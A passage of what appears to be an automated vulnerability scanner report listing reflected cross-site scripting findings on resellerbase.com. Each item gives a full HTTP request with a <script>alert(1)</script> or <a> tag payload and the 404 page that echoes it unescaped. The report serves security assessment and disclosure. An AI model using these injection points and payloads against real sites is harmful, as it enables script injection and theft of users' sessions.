X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesb3892<script>alert(1)</script>c80695c1187/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1336. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e590b<script>alert(1)</script>8535759e12d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmose590b<script>alert(1)</script>8535759e12d/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmose590b<script>alert(1)</script>8535759e12d/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1337. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ace84<script>alert(1)</script>bb8b883514b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/imagesace84<script>alert(1)</script>bb8b883514b/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/imagesace84<script>alert(1)</script>bb8b883514b/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1338. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f5880<script>alert(1)</script>89411777c29 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/ratingf5880<script>alert(1)</script>89411777c29/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/ratingf5880<script>alert(1)</script>89411777c29/5.gif was not found on this server.</p>
...[SNIP]...

2.1339. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 177dd<script>alert(1)</script>8941471b20b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/5.gif177dd<script>alert(1)</script>8941471b20b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/5.gif177dd<script>alert(1)</script>8941471b20b was not found on this server.</p>
...[SNIP]...

2.1340. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3ca40<script>alert(1)</script>f5aed47d309 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/5.gif?3ca40<script>alert(1)</script>f5aed47d309=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/5.gif?3ca40<script>alert(1)</script>f5aed47d309=1 was not found on this server.</p>
...[SNIP]...

2.1341. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bbb17<script>alert(1)</script>e47cdd1bed7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbbb17<script>alert(1)</script>e47cdd1bed7/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbbb17<script>alert(1)</script>e47cdd1bed7/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1342. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2611<script>alert(1)</script>4b71e87809c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16a2611<script>alert(1)</script>4b71e87809c/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16a2611<script>alert(1)</script>4b71e87809c/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1343. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ae4fc<script>alert(1)</script>b489a9ad5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesae4fc<script>alert(1)</script>b489a9ad5/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesae4fc<script>alert(1)</script>b489a9ad5/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1344. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45c01<script>alert(1)</script>2844fe3a9b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos45c01<script>alert(1)</script>2844fe3a9b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos45c01<script>alert(1)</script>2844fe3a9b5/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1345. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 78733<script>alert(1)</script>34052cc57c7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images78733<script>alert(1)</script>34052cc57c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images78733<script>alert(1)</script>34052cc57c7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1346. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3e258<script>alert(1)</script>dc93010767d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating3e258<script>alert(1)</script>dc93010767d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating3e258<script>alert(1)</script>dc93010767d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1347. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2e5d7<script>alert(1)</script>43ec5959f21 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/search.php2e5d7<script>alert(1)</script>43ec5959f21?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php2e5d7<script>alert(1)</script>43ec5959f21?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1348. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3598f<a>677d7a4acc8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3598f<a>677d7a4acc8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search3598f<a>677d7a4acc8&opt=2 was not found on this server.</p>
...[SNIP]...

2.1349. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 564bb<a>1b392273eea was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...564bb<a>1b392273eea&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...564bb<a>1b392273eea&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1350. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 50049<script>alert(1)</script>1b4937a7d80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&50049<script>alert(1)</script>1b4937a7d80=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&50049<script>alert(1)</script>1b4937a7d80=1 was not found on this server.</p>
...[SNIP]...

2.1351. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 2a411<a>2a27b952062 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=22a411<a>2a27b952062 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=22a411<a>2a27b952062 was not found on this server.</p>
...[SNIP]...

2.1352. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4dece<script>alert(1)</script>4bf28aacbc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4dece<script>alert(1)</script>4bf28aacbc0/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4dece<script>alert(1)</script>4bf28aacbc0/16/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1353. http://www.resellerbase.com/detail/16/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c841c<script>alert(1)</script>c8af6c5b133 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16c841c<script>alert(1)</script>c8af6c5b133/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
